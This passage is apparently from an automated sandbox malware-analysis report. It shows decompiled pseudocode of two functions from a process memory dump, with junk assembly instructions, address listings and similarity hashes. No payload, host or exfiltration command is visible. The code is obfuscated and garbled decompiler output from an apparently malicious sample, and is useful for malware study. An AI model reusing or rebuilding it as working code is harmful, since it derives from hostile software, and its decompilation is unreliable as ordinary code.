              							_t16 = L00402114(_t26, _t34,  *((intOrPtr*)(_t29 - 4)));
              							_t35 = _t16;
              							if(_t16 != 0) {
              								_push( *((intOrPtr*)(_t29 - 4)));
              								_t16 = L004021E4(_t26, _t35, __fp0);
              								_t36 = _t16;
              								if(_t16 != 0) {
              									_push( *((intOrPtr*)(_t29 - 4)));
              									_t16 = L00401EB1(_t25, _t36);
              									if(_t16 != 0) {
              										goto L8;
              									}
              								}
              							}
              						}
              					}
              				}
              				return _t16;
              			}













              0x00402ab9
              0x00402ab9
              0x00402ab9
              0x00402ab9
              0x00402ab9
              0x00402aba
              0x00402b30
              0x00000000
              0x00402abc
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af0
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00000000
              0x00402b2b
              0x00402b3d
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402ae7
              0x00402b77

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1cb42d9c437a64efe1c207f66a962eec174b878c172efba8ea04643b21c8500f
              • Instruction ID: 4563f9e46d26d0fc6f1af88425e5f71b2a6fa0fd497496786d5f11c7a0aa9524
              • Opcode Fuzzy Hash: 1cb42d9c437a64efe1c207f66a962eec174b878c172efba8ea04643b21c8500f
              • Instruction Fuzzy Hash: DC018E30504406EAEF10BE61CF4ADBE33799F00344F6440B7AD01B91E6EBBCAE01662E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 51%
              			E00402AC4(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
              				void* _t13;
              				intOrPtr* _t16;
              				void* _t17;
              				void* _t18;
              				void* _t20;
              				void* _t23;
              				void* _t24;
              				void* _t25;
              				void* _t26;
              				void* _t27;
              				void* _t30;
              
              				_t33 = __eflags;
              				_t29 = __esi;
              				_t28 = __edi;
              				_t23 = __ebx;
              				asm("das");
              				asm("aam 0xeb");
              				_t24 = 0xa8;
              				L0040113B(_t13, __ebx, _t24, __edi, __esi, __eflags);
              				_push( *((intOrPtr*)(_t30 - 4)));
              				L004018AF(_t27, __esi, __eflags);
              				_t2 = _t23 + 0x2f1d; // 0x2fd0
              				_t16 = _t2;
              				asm("das");
              				 *_t16 =  *_t16 + _t16;
              				_push(_t16);
              				_push( *((intOrPtr*)(_t30 - 4)));
              				_t17 = L004024AC(__ebx, _t28, __esi, _t33); // executed
              				_t34 = _t17;
              				if(_t17 != 0) {
              					_t18 = L00401E02(_t27, _t28, _t34, __fp0,  *((intOrPtr*)(_t30 - 4)));
              					_t35 = _t18;
              					if(_t18 != 0) {
              						L9:
              						_t39 = gs;
              						if(gs != 0) {
              							_t20 = _t23 + 0x51f2;
              							_t25 = 0x2dfd;
              						} else {
              							_t8 = _t23 + 0x2f5d; // 0x3010
              							_t20 = _t8;
              							_t25 = 0x2295;
              						}
              						_push( *((intOrPtr*)(_t23 + 0x7fef)));
              						_push(_t25);
              						_push(_t20);
              						_push( *((intOrPtr*)(_t30 - 4)));
              						L00401813(_t27, _t29, _t39);
              						asm("cmc");
              						 *0x2ace =  *0x2ace + 0x2ace;
              						_t26 = 0xa8;
              						_t17 = L0040113B(0x2ace, _t23, _t26, _t28, _t29, 0);
              					} else {
              						_t17 = L00402114(_t27, _t35,  *((intOrPtr*)(_t30 - 4)));
              						_t36 = _t17;
              						if(_t17 != 0) {
              							_push( *((intOrPtr*)(_t30 - 4)));
              							_t17 = L004021E4(_t27, _t36, __fp0);
              							_t37 = _t17;
              							if(_t17 != 0) {
              								_push( *((intOrPtr*)(_t30 - 4)));
              								_t17 = L00401EB1(_t24, _t37);
              								if(_t17 != 0) {
              									goto L9;
              								}
              							}
              						}
              					}
              				}
              				return _t17;
              			}














              0x00402ac4
              0x00402ac4
              0x00402ac4
              0x00402ac4
              0x00402ac4
              0x00402ac5
              0x00402ac1
              0x00402ac9
              0x00402ace
              0x00402ad1
              0x00402ad6
              0x00402ad6
              0x00402ad9
              0x00402ada
              0x00402adc
              0x00402add
              0x00402ae0
              0x00402ae5
              0x00402ae7
              0x00402af0
              0x00402af5
              0x00402af7
              0x00402b1d
              0x00402b20
              0x00402b23
              0x00402b32
              0x00402b38
              0x00402b25
              0x00402b25
              0x00402b25
              0x00402b2b
              0x00402b30
              0x00402b3d
              0x00402b43
              0x00402b44
              0x00402b45
              0x00402b48
              0x00402b5c
              0x00402b67
              0x00402b69
              0x00402b71
              0x00402af9
              0x00402afc
              0x00402b01
              0x00402b03
              0x00402b05
              0x00402b08
              0x00402b0d
              0x00402b0f
              0x00402b11
              0x00402b14
              0x00402b1b
              0x00000000
              0x00000000
              0x00402b1b
              0x00402b0f
              0x00402b03
              0x00402af7
              0x00402b77

              Memory Dump Source
              • Source File: 00000006.00000002.884693139.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0aeb0d639299cd7c47a6dd3cb2c02bc57c7db770262e0f8f47f16cd0cb76cbc7
              • Instruction ID: 067266aeff685c6259f46f987b077b20ea8ec5c24405308e70dc4b26590eed1d
              • Opcode Fuzzy Hash: 0aeb0d639299cd7c47a6dd3cb2c02bc57c7db770262e0f8f47f16cd0cb76cbc7
              • Instruction Fuzzy Hash: D5015224504106E6DF117F61CF0AD7E37799F00344B504077AD01B81E6DBBDAE12662E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions